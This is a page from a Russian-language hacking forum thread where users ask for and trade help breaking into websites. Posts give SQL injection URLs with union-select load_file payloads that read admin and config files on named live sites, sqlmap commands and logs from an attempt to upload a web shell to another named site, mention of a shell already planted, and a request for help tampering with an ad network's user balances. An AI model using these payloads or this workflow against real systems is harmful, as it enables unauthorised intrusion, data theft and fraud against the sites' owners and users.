HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 71 из 296 « Первая < 2161 67 68 69 70 71 72 73 74 75 81121171 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #701  
Старый 17.10.2015, 20:51
Kirza
Новичок
Регистрация: 12.03.2013
Сообщений: 0
С нами: 6931766

Репутация: 0
По умолчанию
Цитата:
Сообщение от yarbabin  

update adtram_users set count_rur = * where id=*
почемут не получилось(

Если прав нет и не получится так понимаю.? и есть ли возможность их получить*

Это тизерка. За помощь дам фтп . тоесть на 2их будет
 
Ответить с цитированием

  #702  
Старый 17.10.2015, 21:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
уточните все условия
 
Ответить с цитированием

  #703  
Старый 17.10.2015, 21:05
Kirza
Новичок
Регистрация: 12.03.2013
Сообщений: 0
С нами: 6931766

Репутация: 0
По умолчанию
Цитата:
Сообщение от yarbabin  

уточните все условия
+ Не заметил.

!!!!!!!!
 
Ответить с цитированием

  #704  
Старый 18.10.2015, 01:02
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Цитата:
Сообщение от Br@!ns  

вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin
www.direct-line.ru/news_win.php?id=-2170
union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'),3,4--
или под ваш ресурс поулчается -
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4--
я СОСЕДНИЙ САЙТ ТОЖЕ СМОТРЕЛ.

/var/www/localhost/htdocs/media-monitor.ru/www/

/var/www/localhost/htdocs/media-monitor.ru/www/kernel/ такой путь догадка была ?
 
Ответить с цитированием

  #705  
Старый 18.10.2015, 07:37
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
С нами: 8582863

Репутация: 69
По умолчанию
Цитата:
Сообщение от AlexG  

Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
все работает, спасибо. осталось лишь автоматизировать
 
Ответить с цитированием

  #706  
Старый 18.10.2015, 08:30
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами: 5595446

Репутация: 5
По умолчанию
Цитата:
Сообщение от RedFern.89  

все работает, спасибо. осталось лишь автоматизировать
Ну раз работает, то это уже хорошо По автоматизации, как выше уже сказал yarbabin - php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.
 
Ответить с цитированием

  #707  
Старый 18.10.2015, 08:50
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию
Цитата:
Сообщение от aldemko  

С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo
http://www.aza.com.ua/info.php
страница с раскрытием пути
http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current database: 'test'
current user is DBA: True
uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL:
http://www.aza.com.ua/banner/
| [+] CODE: 200 URL:
http://www.aza.com.ua/cart/
| [+] CODE: 200 URL:
http://www.aza.com.ua/conf/
| [+] CODE: 200 URL:
http://www.aza.com.ua/doc/
| [+] CODE: 200 URL:
http://www.aza.com.ua/email/
| [+] CODE: 200 URL:
http://www.aza.com.ua/edit/
| [+] CODE: 200 URL:
http://www.aza.com.ua/images/
| [+] CODE: 200 URL:
http://www.aza.com.ua/img/
| [+] CODE: 200 URL:
http://www.aza.com.ua/japan/
| [+] CODE: 200 URL:
http://www.aza.com.ua/news/
| [+] CODE: 200 URL:
http://www.aza.com.ua/orders/
| [+] CODE: 200 URL:
http://www.aza.com.ua/pma/
| [+] CODE: 200 URL:
http://www.aza.com.ua/quest/
| [+] CODE: 200 URL:
http://www.aza.com.ua/user/
затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с
http://www.aza.com.ua/email/mail_form_short.html
) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
Код:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо
Шелл туда давно уже залит)

/threads/21336/page-796#post-3820554
 
Ответить с цитированием

  #708  
Старый 18.10.2015, 09:14
aldemko
Познающий
Регистрация: 07.09.2015
Сообщений: 36
С нами: 5622806

Репутация: 0
По умолчанию
я понимаю что залит

я хочу тоже залить

и спросил в чем моя ошибка а не в том что есть люди которые уже залили

у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
 
Ответить с цитированием

  #709  
Старый 18.10.2015, 11:51
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию
Цитата:
Сообщение от aldemko  

я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
Пробуй заливать руками, а не софтом, ищи папку с правами, например папка с картинками.
 
Ответить с цитированием

  #710  
Старый 18.10.2015, 14:09
Roger96
Новичок
Регистрация: 13.10.2015
Сообщений: 18
С нами: 5570966

Репутация: 0
По умолчанию
Здравствуйте,вопрос в следующем, я правильно понимаю,что чтобы залить шелл надо иметь доптуп к админке а соответственно знать логин пасс, дак ведь их можно узнать только через уязвимость а если у меня будет такая уязвимость значит я смогу и слить базу соответственно зачем мне уже заливать шелл дак вот вопрос заключается в следующем: как залить шелл незная логина и пароля админа?
 
Ответить с цитированием
Ответ
Страница 71 из 296 « Первая < 2161 67 68 69 70 71 72 73 74 75 81121171 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.